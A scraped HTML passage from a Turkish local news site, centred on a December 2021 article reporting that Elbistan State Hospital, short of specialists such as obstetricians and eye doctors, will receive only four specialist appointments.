KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="https://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/thumb.php?src=https://www.elbistaninsesi.com/images/banner/Yaşam-Hastanesi-980.jpg&w=980&h=250&q=80" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/hastaneye-pansuman-gibi-atama-h72326.html" title="Hastaneye ‘pansuman’ gibi atama" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/12/hastanes.jpg" alt="Hastaneye ‘pansuman’ gibi atama" />
      <div class="caption">Hastaneye ‘pansuman’ gibi atama</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/500-kisilik-ogrenci-yurdunun-ihale-takvimi-aciklandi-h72318.html" title="500 kişilik öğrenci yurdunun ihale takvimi açıklandı" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/12/e740cad4-4fd2-419e-b8c7-09bd733cbaeb.jpg" alt="500 kişilik öğrenci yurdunun ihale takvimi açıklandı" />
      <div class="caption">500 kişilik öğrenci yurdunun ihale...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/hava-kirliligine-ab-destekli-cityair-projesi-cozum-uretecek-h72310.html" title="Hava kirliliğine AB destekli ‘CityAir’ projesi çözüm üretecek" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/12/hava-kirliliği-cityair-1.jpg" alt="Hava kirliliğine AB destekli ‘CityAir’ projesi çözüm üretecek" />
      <div class="caption">Hava kirliliğine AB destekli ‘CityAir’...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/elbistan-devlet-hastanesine-128-kesitli-tomografi-cihazi-h72309.html" title="Elbistan Devlet Hastanesi’ne 128 kesitli tomografi cihazı" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/12/tomografi-cihazı-1.jpg" alt="Elbistan Devlet Hastanesi’ne 128 kesitli tomografi cihazı" />
      <div class="caption">Elbistan Devlet Hastanesi’ne 128 kesitli...</div>    </a>
  </div>
    <div class="span">
    <a href="https://www.elbistaninsesi.com/guncel/oztunctan-adsmye-hayirli-olsun-ziyareti-h72308.html" title="Öztunç’tan ADSM’ye hayırlı olsun ziyareti" >
      <img src="https://www.elbistaninsesi.com/images/haberler/ustmanset/2021/12/oztunc-adsm-1.jpg" alt="Öztunç’tan ADSM’ye hayırlı olsun ziyareti" />
      <div class="caption">Öztunç’tan ADSM’ye hayırlı olsun ziyareti</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="https://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/KENTPARK-YILBAŞI_1.gif" width="980" height="202" style="width:980px;height: 202px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="https://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/balıkcı.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Hastaneye ‘pansuman’ gibi atama</h1>
                <h2 class="lead" itemprop="description"><strong>Birçok branşta doktor eksikliği ile karşı karşıya bulunan Elbistan Devlet Hastanesi’ne 4 uzman hekim atanacak.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-12-27 16:55:20" content="2021-12-27T16:55:20+02:00">27 Aralık 2021 Pazartesi 16:55</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/hastaneye_pansuman_gibi_atama_h72326_0059b.jpg" alt="Hastaneye ‘pansuman’ gibi atama" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-72326"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="https://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="https://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Kadrolu kadın doğum uzmanının bulunmadığı Elbistan Devlet Hastanesi’ne yapılacak 4 uzman doktor atamasının, yarayı kapatmak bir yana sadece pansuman olacağı değerlendiriliyor.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Bölgenin en büyük sağlık kuruluşu olan Elbistan Devlet Hastanesi, yılda yaklaşık 1 milyon hastaya hizmet veriyor. 24 uzmanlık dalına sağlık hizmeti sunulan Elbistan Devlet Hastanesi, son dönemde doktor açığı ile gündemden düşmüyor. Elbistan Devlet Hastanesi’nin Personel Dağılım Cetveli’ne (PDC) göre 7 doktora kadar çıkabilen kadın doğum polikliniğinde kadrolu doktor bulunmuyor. Bu açık, geçici görevlendirme ile çözülmeye çalışılıyor. Elbistan Devlet Hastanesi’ndeki bir diğer hekim açığı kulak burun ve boğaz hastalıklarında göze çarpıyor. Yine göz hastalıklarında da aynı sorun bulunuyor. 150 bine yakın nüfusu barındıran bölgedeki göz hastalıkları da PDC’nin altında bir sayı ile tedavi edilmeye çalışılıyor.</span></span></p><div class="p_ad"></div>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Vatandaşlar ise, başta göz hastalıkları olmak üzere birçok branşta Merkezi Hekim Randevu Sistemi’nden (MHRS) randevu alamamaktan yakınıyor. Çeşitli sosyal medya platformlarında şikayetlerini dile getiren vatandaşlar, bu duruma bir an önce çözüm bulunmasını istiyor. Yılda 1 milyon insanın sağlığına kavuşmak için başvurduğu Elbistan Devlet Hastanesi’ne, devlet yükümlülüğü kurası haricinde doktor ataması pek yapılmıyor. Tayin olan ya da istifa eden doktorların yerini, atama ile doldurmak güçleşiyor. Özellikle son dönemdeki atamalarda en dikkat çekici nokta ise kadın doğum uzmanı kadrosunun açılmaması olarak göze çarpıyor.</span></span></p>

<p><span style="font-size:16px;"><span style="font-family:&quot;Arial&quot;,sans-serif">Sağlık Bakanlığı, 102.dönem devlet yükümlülüğü kurasında atanacak kadroları açıkladı. Elbistan Devlet Hastanesi’nde hiç olmayan kadın doğum polikliniğine sadece 1 doktor ataması yapılacak. Vatandaşların muayene olmak için kılı kırk yardığı göz hastalıkları ve kulak burun boğaz hastalıkları için ise kadro açılmadı. Elbistan Devlet Hastanesi’ne 1 çocuk hastalıkları, 1 iç hastalıkları ve 1 de genel cerrahi uzmanı atanacağı belirtildi. Söz konusu atamalar, önümüzdeki günlerde bakanlıkça noter huzurunda çekilecek kura ile yapılacak. </span></span></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='https://www.elbistaninsesi.com/guncel/hastaneye-pansuman-gibi-atama-h72326.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistanli-guresci-bolge-birincisi-oldu-h72325.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/tuketici-dernekleri-zamli-aldiginiz-urunu-iade-edin-h72324.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/eksi-20-dereceye-dusen-sogukta-donan-kaz-telef-oldu-h72323.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kahramanmaras-iletisim-baskanligindaki-tecrube-kursusunde-h72322.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/kademeli-elektrik-faturasi-uygulamasi-1-ocakta-basliyor-h72321.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/ak-parti-yeni-ekonomi-modelini-anlatmak-icin-sahaya-indi-h72320.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/500-kisilik-ogrenci-yurdunun-ihale-takvimi-aciklandi-h72318.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistanspor-ilk-yarinin-son-macindan-1-puan-cikardi-h72313.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/hava-kirliligine-ab-destekli-cityair-projesi-cozum-uretecek-h72310.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/elbistan-devlet-hastanesine-128-kesitli-tomografi-cihazi-h72309.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/oztunctan-adsmye-hayirli-olsun-ziyareti-h72308.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/eyyup-cerandan-siir-dunyasina-3-kitap-birden-h72307.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/cmk-iletisim-torenle-hizmete-acildi-h72306.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-buluttan-seker-satisi-ve-stokculuk-aciklamasi-h72305.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/zedeli-30-yillik-odamizi-kiraciliga-mahkum-ettiler-h72304.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/esnaf-kefalette-kredi-talebinde-yogunluk-yasaniyor-h72303.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/baskan-adayi-cemil-sahin-projelerini-acikladi-h72302.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/esinin-demir-cubukla-vurdugu-ekinozulu-kadin-hayatini-kaybetti-h72296.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/oztunc-2022de-sandik-gelecek-h72295.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/polis-ekipleri-vatandasa-uyarici-bilgilerin-yer-aldigi-takvim-dagitti-h72294.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/ercene-kavsaginda-kaza-1-yarali-h72293.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/marketlerde-fahis-fiyat-denetimleri-yapiliyor-h72269.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/hem-spor-kulubu-dernegi-baskanligina-selcuk-kayapinar-getirildi-h72268.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='https://www.elbistaninsesi.com/guncel/suru-yonetimi-elemani-kursu-tamamlandi-h72267.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="https://www.elbistaninsesi.com/guncel/hastaneye-pansuman-gibi-atama-h72326.html" title="Hastaneye ‘pansuman’ gibi atama">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/hastaneye_pansuman_gibi_atama_h72326_0059b.jpg" alt="Hastaneye ‘pansuman’ gibi atama" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Hastaneye ‘pansuman’ gibi atama</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanli-guresci-bolge-birincisi-oldu-h72325.html" title="Elbistanlı güreşçi bölge birincisi oldu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/elbistanli_guresci_bolge_birincisi_oldu_h72325_53658.jpg" alt="Elbistanlı güreşçi bölge birincisi oldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistanlı güreşçi bölge birincisi oldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/tuketici-dernekleri-zamli-aldiginiz-urunu-iade-edin-h72324.html" title="Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/tuketici_dernekleri_zamli_aldiginiz_urunu_iade_edin_h72324_fabd1.jpg" alt="Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Tüketici Dernekleri: “Zamlı aldığınız ürünü iade edin”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/eksi-20-dereceye-dusen-sogukta-donan-kaz-telef-oldu-h72323.html" title="Eksi 20 dereceye düşen soğukta donan kaz telef oldu">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/eksi_20_dereceye_dusen_sogukta_donan_kaz_telef_oldu_h72323_6226c.jpg" alt="Eksi 20 dereceye düşen soğukta donan kaz telef oldu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Eksi 20 dereceye düşen soğukta donan kaz telef oldu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kahramanmaras-iletisim-baskanligindaki-tecrube-kursusunde-h72322.html" title="Kahramanmaraş, İletişim Başkanlığı’ndaki tecrübe kürsüsünde">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/kahramanmaras_iletisim_baskanligindaki_tecrube_kursusunde_h72322_5fc67.jpg" alt="Kahramanmaraş, İletişim Başkanlığı’ndaki tecrübe kürsüsünde" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kahramanmaraş, İletişim Başkanlığı’ndaki tecrübe kürsüsünde</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/kademeli-elektrik-faturasi-uygulamasi-1-ocakta-basliyor-h72321.html" title="Kademeli elektrik faturası uygulaması 1 Ocak’ta başlıyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/kademeli_elektrik_faturasi_uygulamasi_1_ocakta_basliyor_h72321_79098.png" alt="Kademeli elektrik faturası uygulaması 1 Ocak’ta başlıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kademeli elektrik faturası uygulaması 1 Ocak’ta başlıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/ak-parti-yeni-ekonomi-modelini-anlatmak-icin-sahaya-indi-h72320.html" title="AK Parti yeni ekonomi modelini anlatmak için sahaya indi">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/ak_parti_yeni_ekonomi_modelini_anlatmak_icin_sahaya_indi_h72320_372c0.jpg" alt="AK Parti yeni ekonomi modelini anlatmak için sahaya indi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">AK Parti yeni ekonomi modelini anlatmak için sahaya indi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/500-kisilik-ogrenci-yurdunun-ihale-takvimi-aciklandi-h72318.html" title="500 kişilik öğrenci yurdunun ihale takvimi açıklandı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/500_kisilik_ogrenci_yurdunun_ihale_takvimi_aciklandi_h72318_bd177.jpg" alt="500 kişilik öğrenci yurdunun ihale takvimi açıklandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">500 kişilik öğrenci yurdunun ihale takvimi açıklandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistanspor-ilk-yarinin-son-macindan-1-puan-cikardi-h72313.html" title="Elbistanspor ilk yarının son maçından 1 puan çıkardı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/elbistanspor_ilk_yarinin_son_macindan_1_puan_cikardi_h72313_8c526.jpg" alt="Elbistanspor ilk yarının son maçından 1 puan çıkardı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistanspor ilk yarının son maçından 1 puan çıkardı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/hava-kirliligine-ab-destekli-cityair-projesi-cozum-uretecek-h72310.html" title="Hava kirliliğine AB destekli ‘CityAir’ projesi çözüm üretecek">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/hava_kirliligine_ab_destekli_cityair_projesi_cozum_uretecek_h72310_521b6.jpg" alt="Hava kirliliğine AB destekli ‘CityAir’ projesi çözüm üretecek" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Hava kirliliğine AB destekli ‘CityAir’ projesi çözüm üretecek</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/elbistan-devlet-hastanesine-128-kesitli-tomografi-cihazi-h72309.html" title="Elbistan Devlet Hastanesi’ne 128 kesitli tomografi cihazı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/elbistan_devlet_hastanesine_128_kesitli_tomografi_cihazi_h72309_90929.jpg" alt="Elbistan Devlet Hastanesi’ne 128 kesitli tomografi cihazı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elbistan Devlet Hastanesi’ne 128 kesitli tomografi cihazı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/oztunctan-adsmye-hayirli-olsun-ziyareti-h72308.html" title="Öztunç’tan ADSM’ye hayırlı olsun ziyareti">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/oztunctan_adsmye_hayirli_olsun_ziyareti_h72308_d02f1.JPG" alt="Öztunç’tan ADSM’ye hayırlı olsun ziyareti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Öztunç’tan ADSM’ye hayırlı olsun ziyareti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/eyyup-cerandan-siir-dunyasina-3-kitap-birden-h72307.html" title="Eyyup Ceran’dan şiir dünyasına 3 kitap birden">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/eyyup_cerandan_siir_dunyasina_3_kitap_birden_h72307_73ece.jpg" alt="Eyyup Ceran’dan şiir dünyasına 3 kitap birden" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Eyyup Ceran’dan şiir dünyasına 3 kitap birden</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/cmk-iletisim-torenle-hizmete-acildi-h72306.html" title="CMK İletişim törenle hizmete açıldı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/cmk_iletisim_torenle_hizmete_acildi_h72306_96997.JPG" alt="CMK İletişim törenle hizmete açıldı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">CMK İletişim törenle hizmete açıldı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-buluttan-seker-satisi-ve-stokculuk-aciklamasi-h72305.html" title="Başkan Bulut’tan ‘şeker satışı ve stokçuluk’ açıklaması">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/baskan_buluttan_seker_satisi_ve_stokculuk_aciklamasi_h72305_23a0a.jpg" alt="Başkan Bulut’tan ‘şeker satışı ve stokçuluk’ açıklaması" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Bulut’tan ‘şeker satışı ve stokçuluk’ açıklaması</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/zedeli-30-yillik-odamizi-kiraciliga-mahkum-ettiler-h72304.html" title="Zedeli: “30 yıllık odamızı kiracılığa mahkum ettiler”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/zedeli_30_yillik_odamizi_kiraciliga_mahkum_ettiler_h72304_f166e.JPG" alt="Zedeli: “30 yıllık odamızı kiracılığa mahkum ettiler”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Zedeli: “30 yıllık odamızı kiracılığa mahkum ettiler”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/esnaf-kefalette-kredi-talebinde-yogunluk-yasaniyor-h72303.html" title="Esnaf Kefalet’te kredi talebinde yoğunluk yaşanıyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/esnaf_kefalette_kredi_talebinde_yogunluk_yasaniyor_h72303_101a0.jpg" alt="Esnaf Kefalet’te kredi talebinde yoğunluk yaşanıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Esnaf Kefalet’te kredi talebinde yoğunluk yaşanıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/baskan-adayi-cemil-sahin-projelerini-acikladi-h72302.html" title="Başkan adayı Cemil Şahin, projelerini açıkladı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/baskan_adayi_cemil_sahin_projelerini_acikladi_h72302_70f2c.jpg" alt="Başkan adayı Cemil Şahin, projelerini açıkladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan adayı Cemil Şahin, projelerini açıkladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/esinin-demir-cubukla-vurdugu-ekinozulu-kadin-hayatini-kaybetti-h72296.html" title="Eşinin demir çubukla vurduğu Ekinözülü kadın hayatını kaybetti">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/esinin_demir_cubukla_vurdugu_ekinozulu_kadin_hayatini_kaybetti_h72296_3425c.jpg" alt="Eşinin demir çubukla vurduğu Ekinözülü kadın hayatını kaybetti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Eşinin demir çubukla vurduğu Ekinözülü kadın hayatını kaybetti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/oztunc-2022de-sandik-gelecek-h72295.html" title="Öztunç: “2022’de sandık gelecek”">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/oztunc_2022de_sandik_gelecek_h72295_71c7f.jpg" alt="Öztunç: “2022’de sandık gelecek”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Öztunç: “2022’de sandık gelecek”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/polis-ekipleri-vatandasa-uyarici-bilgilerin-yer-aldigi-takvim-dagitti-h72294.html" title="Polis ekipleri vatandaşa uyarıcı bilgilerin yer aldığı takvim dağıttı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/polis_ekipleri_vatandasa_uyarici_bilgilerin_yer_aldigi_takvim_dagitti_h72294_d736f.jpg" alt="Polis ekipleri vatandaşa uyarıcı bilgilerin yer aldığı takvim dağıttı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Polis ekipleri vatandaşa uyarıcı bilgilerin yer aldığı takvim dağıttı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/ercene-kavsaginda-kaza-1-yarali-h72293.html" title="Erçene kavşağında kaza: 1 yaralı">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/ercene_kavsaginda_kaza_1_yarali_h72293_3f405.jpg" alt="Erçene kavşağında kaza: 1 yaralı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Erçene kavşağında kaza: 1 yaralı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/marketlerde-fahis-fiyat-denetimleri-yapiliyor-h72269.html" title="Marketlerde fahiş fiyat denetimleri yapılıyor">

        
        <img src="https://www.elbistaninsesi.com/images/haberler/2021/12/marketlerde_fahis_fiyat_denetimleri_yapiliyor_h72269_13394.jpg" alt="Marketlerde fahiş fiyat denetimleri yapılıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Marketlerde fahiş fiyat denetimleri yapılıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="https://www.elbistaninsesi.com/guncel/hem-spor-kulubu-dernegi-baskanligina-selcuk-kayapinar-getirildi-h72268.html" title="HEM Spor Kulübü Derneği Başkanlığına Selçuk Kayapınar getirildi">

        
